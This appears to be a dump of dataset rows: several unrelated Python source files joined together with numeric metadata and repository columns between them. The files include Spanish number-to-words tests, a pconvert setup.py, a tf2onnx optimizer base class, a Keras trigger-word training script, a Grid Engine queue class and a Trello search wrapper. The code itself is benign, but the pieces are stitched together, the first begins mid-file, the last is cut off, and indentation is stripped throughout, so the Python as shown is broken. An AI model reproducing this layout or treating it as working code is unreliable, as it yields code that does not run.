self.assertEqual(numero_a_letras(numero), 'mil doscientos doce millones seiscientos setenta y tres mil doscientos uno')
numero = 56547567945
self.assertEqual(numero_a_letras(numero), 'cincuenta y seis mil quinientos cuarenta y siete millones quinientos sesenta y siete mil novecientos cuarenta y cinco')
def test_decimales(self):
numero = 1.87
self.assertEqual(numero_a_letras(numero), 'uno punto ochenta y siete')
numero = 1.50
self.assertEqual(numero_a_letras(numero), 'uno punto cincuenta')
numero = 1.04
self.assertEqual(numero_a_letras(numero), 'uno punto cero cuatro')
numero = 1.00
self.assertEqual(numero_a_letras(numero), 'uno')
def test_negativos(self):
numero = -4.5
self.assertEqual(numero_a_letras(numero), 'menos cuatro punto cincuenta')
def test_moneda(self):
numero = 1212673201
self.assertEqual(numero_a_moneda(numero), 'mil doscientos doce millones seiscientos setenta y tres mil doscientos un pesos con cero centavos')
numero = 56547567945.5
self.assertEqual(numero_a_moneda(numero), 'cincuenta y seis mil quinientos cuarenta y siete millones quinientos sesenta y siete mil novecientos cuarenta y cinco pesos con cincuenta centavos')
numero = 1.01
self.assertEqual(numero_a_moneda(numero), 'un peso con un centavo')
if __name__ == '__main__':
unittest.main()
| 39.980769
| 199
| 0.685907
| 3,954
| 0.950938
| 0
| 0
| 0
| 0
| 0
| 0
| 1,120
| 0.26936
|
b708d72fd35c4c8f3891e434790ce2fd08903cc3
| 2,238
|
py
|
Python
|
setup.py
|
hivesolutions/pconvert
|
ff4d09400dc1542080d86f3f99c702ab0ef1405d
|
[
"Apache-1.1"
] | 4
|
2020-04-18T08:38:42.000Z
|
2020-12-10T01:54:57.000Z
|
setup.py
|
hivesolutions/pconvert
|
ff4d09400dc1542080d86f3f99c702ab0ef1405d
|
[
"Apache-1.1"
] | 3
|
2020-09-09T16:40:47.000Z
|
2020-11-11T13:21:58.000Z
|
setup.py
|
hivesolutions/pconvert
|
ff4d09400dc1542080d86f3f99c702ab0ef1405d
|
[
"Apache-1.1"
] | 4
|
2016-09-28T10:32:42.000Z
|
2020-11-11T12:39:02.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import setuptools
setuptools.setup(
name = "pconvert-python",
version = "0.4.1",
author = "Hive Solutions Lda.",
author_email = "development@hive.pt",
description = "PNG Convert",
license = "Apache License, Version 2.0",
keywords = "pconvert converted compositor",
url = "http://pconvert.hive.pt",
packages = [
"pconvert_py",
"pconvert_py.test"
],
test_suite = "pconvert_py.test",
package_dir = {
"" : os.path.normpath("src/python")
},
ext_modules = [
setuptools.Extension(
"pconvert",
include_dirs = ["src/pconvert", "/usr/local/include"],
libraries = [] if os.name in ("nt",) else ["m", "png"],
library_dirs = ["/usr/local/lib"],
extra_compile_args = [] if os.name in ("nt",) else [
"-O3",
"-finline-functions",
"-Winline"
],
sources = [
"src/pconvert/extension.c",
"src/pconvert/opencl.c",
"src/pconvert/pconvert.c",
"src/pconvert/stdafx.c",
"src/pconvert/structs.c",
"src/pconvert/util.c"
],
define_macros = [
("PCONVERT_EXTENSION", None),
("PASS_ERROR", None)
]
)
],
classifiers = [
"Development Status :: 5 - Production/Stable",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.0",
"Programming Language :: Python :: 3.1",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7"
]
)
| 33.402985
| 68
| 0.498213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,129
| 0.504468
|
b70b18ff12c786f422768e26c9e8b6e9b54e1407
| 2,281
|
py
|
Python
|
tf2onnx/optimizer/optimizer_base.py
|
gcunhase/tensorflow-onnx
|
8a61c99fbc39c36d70781f95e2c7c582f46ba2db
|
[
"Apache-2.0"
] | 1,473
|
2018-03-16T02:47:33.000Z
|
2022-03-31T03:43:52.000Z
|
tf2onnx/optimizer/optimizer_base.py
|
gcunhase/tensorflow-onnx
|
8a61c99fbc39c36d70781f95e2c7c582f46ba2db
|
[
"Apache-2.0"
] | 1,208
|
2018-03-14T09:58:49.000Z
|
2022-03-31T17:56:20.000Z
|
tf2onnx/optimizer/optimizer_base.py
|
gcunhase/tensorflow-onnx
|
8a61c99fbc39c36d70781f95e2c7c582f46ba2db
|
[
"Apache-2.0"
] | 350
|
2018-04-03T03:48:40.000Z
|
2022-03-30T11:23:55.000Z
|
# SPDX-License-Identifier: Apache-2.0
"""Graph Optimizer Base"""
import copy
from .. import logging, utils
class GraphOptimizerBase(object):
"""optimizer graph to improve performance
"""
def __init__(self):
self._logger = logging.getLogger('.'.join(__name__.split('.')[:-1] + [self.__class__.__name__]))
self._graph_been_opt = False
self.opt_iteration = 0
@property
def logger(self):
return self._logger
@property
def is_debug_mode(self):
return utils.is_debug_mode()
@property
def graph_been_opt(self):
return self._graph_been_opt
@graph_been_opt.setter
def graph_been_opt(self, value):
self._graph_been_opt = value
def optimize(self, graph, iteration):
""" Optimize graph, return optimized graph. """
before = graph.dump_node_statistics()
self.opt_iteration = iteration
graph = self._optimize(graph)
graph.update_proto()
graph.delete_unused_nodes(graph.outputs)
after = graph.dump_node_statistics()
self._print_stat_diff(before, after)
return graph
def _optimize(self, graph):
""" Derived class should override this function. """
raise NotImplementedError
@staticmethod
def _apply_optimization(graph, optimize_func):
"""
optimize graph
will also optimize graph of nodes'
Args:
graph: the top level graph to be optimized
optimize_func: function to optimize graph
"""
graph = optimize_func(graph)
for node in graph.get_nodes():
body_graphs = node.get_body_graphs()
if body_graphs:
for attr, b_g in body_graphs.items():
b_g = GraphOptimizerBase._apply_optimization(b_g, optimize_func)
node.set_body_graph_as_attr(attr, b_g)
return graph
def _print_stat_diff(self, before, after):
diff = copy.deepcopy(after)
diff.subtract(before)
diff = ["{} {} ({}->{})".format(k, str(v) if v < 0 else '+' + str(v), before.get(k, 0), after.get(k, 0))
for k, v in sorted(diff.items()) if v != 0]
self.logger.verbose(', '.join(diff) if diff else "no change")
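# A minimal sketch of how a concrete optimizer plugs into this base class: only
# _optimize() is overridden, and _apply_optimization() is used so that body graphs
# (loop/if subgraphs) are visited as well. "NoopOptimizer" is an illustrative name,
# not an optimizer shipped with tf2onnx.
class NoopOptimizer(GraphOptimizerBase):
    """Example optimizer that leaves every graph unchanged."""
    def _optimize(self, graph):
        # a real optimizer would rewrite or remove nodes here
        return self._apply_optimization(graph, lambda g: g)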
| 29.623377
| 112
| 0.615081
| 2,167
| 0.950022
| 0
| 0
| 954
| 0.418238
| 0
| 0
| 455
| 0.199474
|
b70b7e3ec23c6100b7d22c2fc18a52d85615b5ef
| 3,299
|
py
|
Python
|
train.py
|
anishjain18/Trigger-Word-Detector
|
85d635cabc553c612db414853b4569ec869d9bf7
|
[
"MIT"
] | 15
|
2021-11-03T04:33:22.000Z
|
2022-03-30T18:24:57.000Z
|
train.py
|
anishjain18/Trigger-Word-Detector
|
85d635cabc553c612db414853b4569ec869d9bf7
|
[
"MIT"
] | null | null | null |
train.py
|
anishjain18/Trigger-Word-Detector
|
85d635cabc553c612db414853b4569ec869d9bf7
|
[
"MIT"
] | 21
|
2021-11-03T04:34:11.000Z
|
2022-03-22T10:17:06.000Z
|
import numpy as np
from pydub import AudioSegment
import random
import sys
import io
import os
import glob
import IPython
from td_utils import *
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Model, load_model, Sequential
from tensorflow.keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D
from tensorflow.keras.layers import GRU, Bidirectional, BatchNormalization, Reshape
from tensorflow.keras.optimizers import Adam
Tx = 5511 # The number of time steps input to the model from the spectrogram
n_freq = 101 # Number of frequencies input to the model at each time step of the spectrogram
Ty = 1375 # The number of time steps in the output of our model
X = np.load("./XY_train/X0.npy")
Y = np.load("./XY_train/Y0.npy")
X = np.concatenate((X, np.load("./XY_train/X1.npy")), axis=0)
Y = np.concatenate((Y, np.load("./XY_train/Y1.npy")), axis=0)
Y = np.swapaxes(Y, 1, 2)
# Load preprocessed dev set examples
X_dev = np.load("./XY_dev/X_dev.npy")
Y_dev = np.load("./XY_dev/Y_dev.npy")
# GRADED FUNCTION: model
def modelf(input_shape):
"""
Function creating the model's graph in Keras.
Argument:
input_shape -- shape of the model's input data (using Keras conventions)
Returns:
model -- Keras model instance
"""
X_input = Input(shape = input_shape)
### START CODE HERE ###
# Step 1: CONV layer (≈4 lines)
X = Conv1D(196, kernel_size = 15, strides = 4)(X_input) # CONV1D
X = BatchNormalization()(X) # Batch normalization
X = Activation("relu")(X) # ReLu activation
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 2: First GRU Layer (≈4 lines)
X = GRU(units = 128, return_sequences = True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
# Step 3: Second GRU Layer (≈4 lines)
X = GRU(units = 128, return_sequences = True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 4: Time-distributed dense layer (≈1 line)
X = TimeDistributed(Dense(1, activation = "sigmoid"))(X) # time distributed (sigmoid)
### END CODE HERE ###
model = Model(inputs = X_input, outputs = X)
return model
model = modelf(input_shape = (Tx, n_freq))
model.summary()
opt = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, decay=0.01)
model.compile(loss='binary_crossentropy', optimizer=opt, metrics=["accuracy"])
model.fit(X, Y, batch_size=20, epochs=100)
loss, acc = model.evaluate(X_dev, Y_dev)
print("Dev set accuracy = ", acc)
from tensorflow.keras.models import model_from_json
json_file = open('./models/model_new3.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
model.load_weights('./models/model_new3.h5')
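# A small sketch of using the restored model, assuming the dev-set arrays loaded above;
# each output step is the probability that the trigger word just ended at that time step.
probs = model.predict(X_dev[:1])        # shape (1, Ty, 1)
print("max trigger probability:", float(probs.max()))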
| 34.726316
| 109
| 0.632313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,188
| 0.359238
|
b70ca02982a56be8fc00bc20da13192c0eb44f5a
| 1,753
|
py
|
Python
|
armchem/workspace.py
|
mmgalushka/armchem
|
00bd0d2085b47b03724af422b75e2801619b8c03
|
[
"MIT"
] | 3
|
2020-05-13T21:48:26.000Z
|
2020-10-18T14:42:00.000Z
|
armchem/workspace.py
|
mmgalushka/armchem
|
00bd0d2085b47b03724af422b75e2801619b8c03
|
[
"MIT"
] | null | null | null |
armchem/workspace.py
|
mmgalushka/armchem
|
00bd0d2085b47b03724af422b75e2801619b8c03
|
[
"MIT"
] | 1
|
2022-02-27T01:04:38.000Z
|
2022-02-27T01:04:38.000Z
|
# =====================================================
# Copyright (c) 2017-present, AUROMIND Ltd.
# =====================================================
import os
from network import NeuralNetwork
from experiments import Experiment
from utils import save_object, load_object
# -----------------------------------------------------
# Exporting Method
# -----------------------------------------------------
def create_workspace(root=''):
return Workspace(root)
# -----------------------------------------------------
# Workspace Handler
# -----------------------------------------------------
class Workspace(object):
def __init__(self, root):
self.__root_dir = root
self.__models_dir = 'models'
self.__experiments_dir = 'experiments'
def save(self, file_name, artifact):
if isinstance(artifact, NeuralNetwork):
base = os.path.join(self.__root_dir, self.__models_dir)
save_object(
os.path.join(base, file_name + '.cfg'),
(artifact.get_input_metadata(), artifact.get_output_metadata())
)
artifact.get_model().save_weights(os.path.join(base, file_name + '.wt'))
elif isinstance(artifact, Experiment):
basedir = os.path.join(self.__root_dir, self.__experiments_dir)
save_object(
os.path.join(basedir, file_name + '.exp'),
artifact
)
else:
raise Exception('Attempt to save unsupported artifact.')
def load_experiment(self, name):
basedir = os.path.join(self.__root_dir, self.__experiments_dir)
return load_object(
os.path.join(basedir, name + '.exp')
)
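# A minimal usage sketch; the workspace root and artifact names below are placeholders,
# and the root is assumed to already contain the "models" and "experiments" folders
# this class reads from and writes to.
if __name__ == '__main__':
    workspace = create_workspace('my_workspace')
    experiment = workspace.load_experiment('baseline')   # reads my_workspace/experiments/baseline.exp
    workspace.save('baseline_copy', experiment)          # writes my_workspace/experiments/baseline_copy.exp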
| 31.872727
| 84
| 0.497433
| 1,141
| 0.650884
| 0
| 0
| 0
| 0
| 0
| 0
| 495
| 0.282373
|
b70d32e911f44e99f8dbffab2918320edced91af
| 4,353
|
py
|
Python
|
uge/objects/cluster_queue_v1_0.py
|
gridengine/config-api
|
694f9667bb6569170356336283a18351456e8b82
|
[
"Apache-2.0"
] | 6
|
2017-01-18T00:11:19.000Z
|
2022-02-10T08:18:00.000Z
|
uge/objects/cluster_queue_v1_0.py
|
gridengine/config-api
|
694f9667bb6569170356336283a18351456e8b82
|
[
"Apache-2.0"
] | 3
|
2017-05-11T13:54:42.000Z
|
2020-08-12T06:15:43.000Z
|
uge/objects/cluster_queue_v1_0.py
|
gridengine/config-api
|
694f9667bb6569170356336283a18351456e8b82
|
[
"Apache-2.0"
] | 4
|
2017-05-11T13:27:33.000Z
|
2019-10-29T02:02:24.000Z
|
#!/usr/bin/env python
#
# ___INFO__MARK_BEGIN__
#######################################################################################
# Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.)
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################################
# ___INFO__MARK_END__
#
from .qconf_object import QconfObject
class ClusterQueue(QconfObject):
""" This class encapsulates UGE cluster queue object. """
#: Object version.
VERSION = '1.0'
#: Object name key.
NAME_KEY = 'qname'
#: Object keys that must be provided by user.
USER_PROVIDED_KEYS = ['qname']
#: Default values for required data keys.
REQUIRED_DATA_DEFAULTS = {
'hostlist': None,
'seq_no': 0,
'load_thresholds': 'np_load_avg=1.75',
'suspend_thresholds': None,
'nsuspend': 1,
'suspend_interval': '00:05:00',
'priority': 0,
'min_cpu_interval': '00:05:00',
'qtype': 'BATCH INTERACTIVE',
'ckpt_list': None,
'pe_list': 'make',
'jc_list': ['NO_JC', 'ANY_JC'],
'rerun': False,
'slots': 1,
'tmpdir': '/tmp',
'shell': '/bin/sh',
'prolog': None,
'epilog': None,
'shell_start_mode': 'unix_behavior',
'starter_method': None,
'suspend_method': None,
'resume_method': None,
'terminate_method': None,
'notify': '00:00:60',
'owner_list': None,
'user_lists': None,
'xuser_lists': None,
'subordinate_list': None,
'complex_values': None,
'projects': None,
'xprojects': None,
'calendar': None,
'initial_state': 'default',
's_rt': float('inf'),
'h_rt': float('inf'),
'd_rt': float('inf'),
's_cpu': float('inf'),
'h_cpu': float('inf'),
's_fsize': float('inf'),
'h_fsize': float('inf'),
's_data': float('inf'),
'h_data': float('inf'),
's_stack': float('inf'),
'h_stack': float('inf'),
's_core': float('inf'),
'h_core': float('inf'),
's_rss': float('inf'),
'h_rss': float('inf'),
's_vmem': float('inf'),
'h_vmem': float('inf')
}
INT_KEY_MAP = QconfObject.get_int_key_map(REQUIRED_DATA_DEFAULTS)
FLOAT_KEY_MAP = QconfObject.get_float_key_map(REQUIRED_DATA_DEFAULTS)
DEFAULT_LIST_DELIMITER = ','
LIST_KEY_MAP = {
'slots': ',',
'load_thresholds': ',',
'suspend_thresholds': ',',
'ckpt_list': ',',
'pe_list': ',',
'jc_list': ',',
'owner_list': ',',
'user_lists': ',',
'xuser_lists': ',',
'subordinate_list': ',',
'complex_values': ',',
'projects': ',',
'xprojects': ',',
}
def __init__(self, name=None, data=None, metadata=None, json_string=None):
"""
Class constructor.
:param name: Queue name. If provided, it will override queue name from data or JSON string parameters ('qname' key).
:type name: str
:param data: Queue data. If provided, it will override corresponding data from queue JSON string representation.
:type data: dict
:param metadata: Queue metadata. If provided, it will override corresponding metadata from queue JSON string representation.
:type metadata: dict
:param json_string: Queue JSON string representation.
:type json_string: str
:raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not contain dictionary representing a ClusterQueue object.
"""
QconfObject.__init__(self, name=name, data=data, metadata=metadata, json_string=json_string)
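# A minimal construction sketch: only "qname" must come from the user (USER_PROVIDED_KEYS);
# every other key falls back to REQUIRED_DATA_DEFAULTS. The queue name and data below are
# placeholders, not values taken from this module.
if __name__ == '__main__':
    queue = ClusterQueue(name='all.q', data={'hostlist': '@allhosts', 'slots': 8})
    # the resulting object can then be handed to the qconf API layer to add or modify the queue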
| 33.484615
| 172
| 0.574546
| 3,426
| 0.787043
| 0
| 0
| 0
| 0
| 0
| 0
| 2,786
| 0.640018
|
b70d6fb35471bf494fd9d6d6d9ddbd3c3ad564bf
| 6,789
|
py
|
Python
|
decomplz4l_prep/__init__.py
|
Tiempogithub/decomplz4l
|
1043daf70072bb4dc229c7503bce3b212156921b
|
[
"BSD-3-Clause"
] | 1
|
2020-02-28T16:21:00.000Z
|
2020-02-28T16:21:00.000Z
|
decomplz4l_prep/__init__.py
|
Tiempogithub/decomplz4l
|
1043daf70072bb4dc229c7503bce3b212156921b
|
[
"BSD-3-Clause"
] | null | null | null |
decomplz4l_prep/__init__.py
|
Tiempogithub/decomplz4l
|
1043daf70072bb4dc229c7503bce3b212156921b
|
[
"BSD-3-Clause"
] | 2
|
2019-06-28T21:36:01.000Z
|
2019-08-19T07:55:51.000Z
|
#!/usr/bin/env python3
import os
import sys
import runpy
from intelhex import IntelHex
#import lz4.frame
import subprocess
import shutil
def get_section_from_elf(elf,section_name):
objdump = shutil.which('objdump')
cmd = [ objdump,elf,'-h','--section='+section_name]
out=""
res=subprocess.run(cmd, stdout=subprocess.PIPE, check=True)
out = res.stdout
fields = out.splitlines()[5].split()
size=int("0x"+fields[2].decode("utf-8") ,0)
run=int("0x"+fields[3].decode("utf-8") ,0)
load=int("0x"+fields[4].decode("utf-8") ,0)
return {'load':load,'run':run,'size':size}
def bytes_length(x):
return (x.bit_length() + 7) // 8
if __name__ == "__main__":
script_directory = os.path.dirname(os.path.realpath(__file__))
lz4 = os.path.join(script_directory,'lz4')
if not os.path.isfile(lz4):
lz4 = shutil.which('lz4')
assert(lz4 is not None)
    if len(sys.argv) != 3:
print("ERROR: incorrect arguments")
print("Usage:")
print("prep.py <ihex> <metainfo>")
exit()
ihexf = sys.argv[1]
metainfof = sys.argv[2]
ih = IntelHex()
ihgu = IntelHex()
ih.loadhex(ihexf)
all_sections = ih.segments()
print("input hex file sections:")
for sec in all_sections:
print("0x%08X 0x%08X"%(sec[0],sec[1]-1))
file_globals = runpy.run_path(metainfof,init_globals={'prep_path':os.path.dirname(script_directory)})
comp_storage_start=file_globals["comp_storage"]['start']
comp_storage_end=file_globals["comp_storage"]['end']
map_load_size=file_globals["map_load_size"]
map_run_size=file_globals["map_run_size"]
grow_up=file_globals["grow_up"]
comp_sections=file_globals["comp_sections"]
def get_file_global(name,default_value=None):
if name in file_globals:
out=file_globals[name]
else:
out=default_value
return out
linear_mode=get_file_global("linear_mode",True)
start_at_end=get_file_global("start_at_end",False)
use_seg_as_linear=get_file_global("use_seg_as_linear",False)
print("%d sections to compress"%len(comp_sections))
for sec in comp_sections:
print("load: 0x%08X -> 0x%08X, run: 0x%08X -> 0x%08X, size: 0x%X"%(sec['load'],sec['load']+sec['size']-1,sec['run'],sec['run']+sec['size']-1,sec['size']))
mapsize = (map_load_size+map_run_size)*len(comp_sections)
map_storage=comp_storage_start
comp_storage=comp_storage_start+mapsize
#compress the sections
for sec in comp_sections:
#write the start address in the map LUT
start_offset_bytes = (comp_storage-comp_storage_start).to_bytes(8,byteorder='little')
for i in range(0,map_load_size):
ihgu[map_storage] = start_offset_bytes[i]
map_storage+=1
run_bytes = sec['run'].to_bytes(8,byteorder='little')
for i in range(0,map_run_size):
ihgu[map_storage] = run_bytes[i]
map_storage+=1
data = ih[sec['load']:sec['load']+sec['size']]
ba = bytearray()
for bi in range(sec['load'],sec['load']+sec['size']):
ba.append(ih[bi])
newfile=open('lz4_input.bin','wb')
newfile.write(ba)
newfile.close()
cmd = [ lz4,'-9','-l','-f','lz4_input.bin','lz4_output.bin']
subprocess.run(cmd,check=True)
size=0
with open('lz4_output.bin', "rb") as f:
#skip the frame descriptor
frame_descriptor = f.read(4)
byte = f.read(1)
while byte:
ihgu[comp_storage] = int.from_bytes( byte, byteorder='little', signed=False )
comp_storage+=1
size+=1
byte = f.read(1)
sec['comp_size']=size
if comp_storage>comp_storage_end:
print("ERROR: compressed storage overflow by %d"%(comp_storage - comp_storage_end))
exit(1)
else:
used = comp_storage - comp_storage_start
free = comp_storage_end+1-comp_storage
print("0x%08x bytes used in compressed storage"%(used))
print("0x%08x bytes free in compressed storage"%(free))
comp_storage_pad=0
if grow_up:
#just rename ihex object
iho = ihgu
else:
#reverse compressed area storage
iho = IntelHex()
map_storage=comp_storage_end+1
#if 0!=(free%16):
# comp_storage_pad = free%16
# free-=comp_storage_pad
comp_storage=comp_storage_start+free
if 0!=(comp_storage%16):
#add padding data
for i in range(comp_storage-(comp_storage%16),comp_storage):
iho[i]=0x55
#move the compressed data up
print("copy 0x%X bytes from 0x%08X to 0x%08X"%(used,comp_storage_start+mapsize,comp_storage_start+free))
for i in range(0,used):
iho[comp_storage_start+free+i] = ihgu[comp_storage_start+mapsize+i]
#rebuild map
for sec in comp_sections:
sec['load']=comp_storage
#write the start offset in the map LUT
map_storage-=map_load_size+map_run_size
start_offset_bytes = (comp_storage-comp_storage_start).to_bytes(8,byteorder='little')
for i in range(0,map_load_size):
iho[map_storage] = start_offset_bytes[i]
map_storage+=1
run_bytes = sec['run'].to_bytes(8,byteorder='little')
for i in range(0,map_run_size):
iho[map_storage] = run_bytes[i]
map_storage+=1
map_storage-=map_load_size+map_run_size
comp_storage+=sec['comp_size']
#print("0x%x"%comp_storage)
#print("0x%x"%map_storage)
assert(map_storage==comp_storage+comp_storage_pad)
#create a list of start address of the sections which have been compressed
print("compressed sections load addresses:")
comp_sections_start=[]
for sec in comp_sections:
print("0x%08X"%sec['load'])
comp_sections_start.append(sec['load'])
#copy all regular sections
for sec in all_sections:
print("copy section from %x to %x"%(sec[0],sec[1]))
for i in range(sec[0],sec[1]):
if (i<comp_storage_start) or (i>=comp_storage_end):
iho[i]=ih[i]
#copy start address
#print("start address: ",ih.start_addr)
iho.start_addr = ih.start_addr
if not linear_mode or start_at_end or use_seg_as_linear:
#need custom version of intelhex, get it here: https://github.com/sebastien-riou/intelhex
iho.write_hex_file(ihexf+".lz4l.ihex",linear_mode=linear_mode,start_at_end=start_at_end,use_seg_as_linear=use_seg_as_linear)
else:
iho.write_hex_file(ihexf+".lz4l.ihex")
| 37.098361
| 162
| 0.627338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,595
| 0.234939
|
b70e5693b800019c043a966f67e793acac17d9e5
| 3,819
|
py
|
Python
|
application/views/service/service.py
|
celerysoft/scholar-tool-manager
|
6188d981266eeec391ba646b9c7dc426ddec37e8
|
[
"Apache-2.0"
] | null | null | null |
application/views/service/service.py
|
celerysoft/scholar-tool-manager
|
6188d981266eeec391ba646b9c7dc426ddec37e8
|
[
"Apache-2.0"
] | 3
|
2019-04-29T22:55:49.000Z
|
2020-05-14T14:35:42.000Z
|
application/views/service/service.py
|
celerysoft/ScholarToolManager
|
6188d981266eeec391ba646b9c7dc426ddec37e8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import make_response, Blueprint
from app import derive_import_root, add_url_rules_for_blueprint
from application import exception
from application.model.service import Service
from application.model.service_template import ServiceTemplate
from application.util.database import session_scope
from application.views.base_api import BaseNeedLoginAPI, ApiResult
class ServiceAPI(BaseNeedLoginAPI):
methods = ['GET', 'PATCH']
def get(self):
service_uuid = self.get_data('uuid')
if self.valid_data(service_uuid):
return self.get_service_by_uuid(service_uuid)
else:
return self.get_user_services(self.user_uuid)
def get_user_services(self, user_uuid):
with session_scope() as db_session:
query = db_session.query(Service, ServiceTemplate.title) \
.outerjoin(ServiceTemplate, Service.template_uuid == ServiceTemplate.uuid) \
.filter(Service.user_uuid == user_uuid) \
.filter(Service.status != Service.STATUS.DELETED) \
.order_by(Service.created_at)
page, page_size, offset, max_page = self._derive_page_parameter(query.count())
services = query.offset(offset).limit(page_size).all()
service_list = []
for record in services:
service = record.Service
service_dict = service.to_dict()
service_dict['title'] = record.title
service_list.append(service_dict)
result = ApiResult('获取用户学术服务信息成功', payload={
'page': page,
'page_size': page_size,
'max_page': max_page,
'services': service_list
})
return result.to_response()
def get_service_by_uuid(self, service_uuid):
with session_scope() as session:
service = session.query(Service).filter(Service.uuid == service_uuid,
Service.status != Service.STATUS.DELETED).first()
if service is None:
raise exception.api.NotFound('套餐不存在')
if service.user_uuid != self.user_uuid:
raise exception.api.Forbidden('无权查看其他用户的套餐信息')
template = session.query(ServiceTemplate) \
.filter(ServiceTemplate.uuid == service.template_uuid).first()
service_dict = service.to_dict()
service_dict['title'] = template.title
service_dict['price'] = float(template.price)
result = ApiResult('获取学术服务详情成功', payload={
'service': service_dict
})
return make_response(result.to_response())
def patch(self):
with session_scope() as session:
uuid = self.get_post_data('uuid', require=True, error_message='缺少uuid字段')
service = session.query(Service).filter(Service.uuid == uuid).first()
if service is None:
raise exception.api.NotFound('学术服务不存在')
if service.user_uuid != self.user_uuid:
raise exception.api.Forbidden('无权修改其他用户的学术服务')
auto_renew = self.get_post_data('auto_renew')
if self.valid_data(auto_renew):
self.patch_service_auto_renew(service)
result = ApiResult('修改套餐成功', 201)
return result.to_response()
@staticmethod
def patch_service_auto_renew(service: Service):
if service.type == service.TYPE.MONTHLY:
latter_auto_renew_status = 1 if service.auto_renew == 0 else 0
service.auto_renew = latter_auto_renew_status
view = ServiceAPI
bp = Blueprint(__name__.split('.')[-1], __name__)
root = derive_import_root(__name__)
add_url_rules_for_blueprint(root, bp)
| 38.19
| 101
| 0.625556
| 3,417
| 0.863097
| 0
| 0
| 247
| 0.062389
| 0
| 0
| 359
| 0.090679
|
b713985ca32368cb00dff148dea34d4486a5b5ad
| 1,293
|
py
|
Python
|
trello/searchs.py
|
fif911/trello3_little_bit_updated
|
baf0275c5a89b3bcf9c1544897cbe25fafbc53d0
|
[
"BSD-2-Clause"
] | 16
|
2016-01-19T17:02:24.000Z
|
2020-02-20T19:23:32.000Z
|
trello/searchs.py
|
fif911/trello3_little_bit_updated
|
baf0275c5a89b3bcf9c1544897cbe25fafbc53d0
|
[
"BSD-2-Clause"
] | 3
|
2016-02-10T14:17:58.000Z
|
2016-07-26T01:31:54.000Z
|
trello/searchs.py
|
fif911/trello3_little_bit_updated
|
baf0275c5a89b3bcf9c1544897cbe25fafbc53d0
|
[
"BSD-2-Clause"
] | 7
|
2016-02-09T23:47:00.000Z
|
2021-06-05T17:03:22.000Z
|
import json
import requests
class Searchs(object):
__module__ = 'trello'
def __init__(self, apikey, token=None):
self._apikey = apikey
self._token = token
def get(self, query, idOrganizations, idBoards=None, idCards=None, modelTypes=None, board_fields=None, boards_limit=None, card_fields=None, cards_limit=None, card_board=None, card_list=None, card_members=None, organization_fields=None, organizations_limit=None, member_fields=None, members_limit=None, action_fields=None, actions_limit=None, actions_since=None, partial=None):
resp = requests.get("https://trello.com/1/search" % (), params=dict(key=self._apikey, token=self._token, query=query, idOrganizations=idOrganizations, idBoards=idBoards, idCards=idCards, modelTypes=modelTypes, board_fields=board_fields, boards_limit=boards_limit, card_fields=card_fields, cards_limit=cards_limit, card_board=card_board, card_list=card_list, card_members=card_members, organization_fields=organization_fields, organizations_limit=organizations_limit, member_fields=member_fields, members_limit=members_limit, action_fields=action_fields, actions_limit=actions_limit, actions_since=actions_since, partial=partial), data=None)
resp.raise_for_status()
return resp.json()
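# A minimal usage sketch; the API key, token and query below are placeholders.
# get() requires the query string and idOrganizations, everything else is optional.
if __name__ == '__main__':
    searches = Searchs('YOUR_API_KEY', token='YOUR_TOKEN')
    results = searches.get('roadmap', idOrganizations='mine')
    print(results)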
| 76.058824
| 649
| 0.784996
| 1,251
| 0.967517
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.028616
|
b713b15110cb69ba0de9387f17cdd3a78231774b
| 3,736
|
py
|
Python
|
architect/design/bounded_exogenous_parameters.py
|
MIT-REALM/architect
|
1b5bbf6ddf08146cd3b8ad5c058539ac140e9ebb
|
[
"BSD-2-Clause"
] | 2
|
2022-03-30T03:07:26.000Z
|
2022-03-30T17:35:21.000Z
|
architect/design/bounded_exogenous_parameters.py
|
MIT-REALM/architect
|
1b5bbf6ddf08146cd3b8ad5c058539ac140e9ebb
|
[
"BSD-2-Clause"
] | null | null | null |
architect/design/bounded_exogenous_parameters.py
|
MIT-REALM/architect
|
1b5bbf6ddf08146cd3b8ad5c058539ac140e9ebb
|
[
"BSD-2-Clause"
] | null | null | null |
"""Exogenous parameters are anything "uncontrollable" that affect the design; these are
what we consider robustness against and are typically drawn from some distribution
"""
from typing import Optional, Sequence, Tuple, Union
import jax
import jax.numpy as jnp
from jax._src.prng import PRNGKeyArray
import numpy as np
from .exogenous_parameters import ExogenousParameters
class BoundedExogenousParameters(ExogenousParameters):
"""A subclass of ExogenousParameters that includes hyperrectangle bounds for each
dimension.
"""
def __init__(
self,
size: int,
bounds: jnp.ndarray,
names: Optional[list[str]] = None,
):
"""
Initialize the ExogenousParameters object.
args:
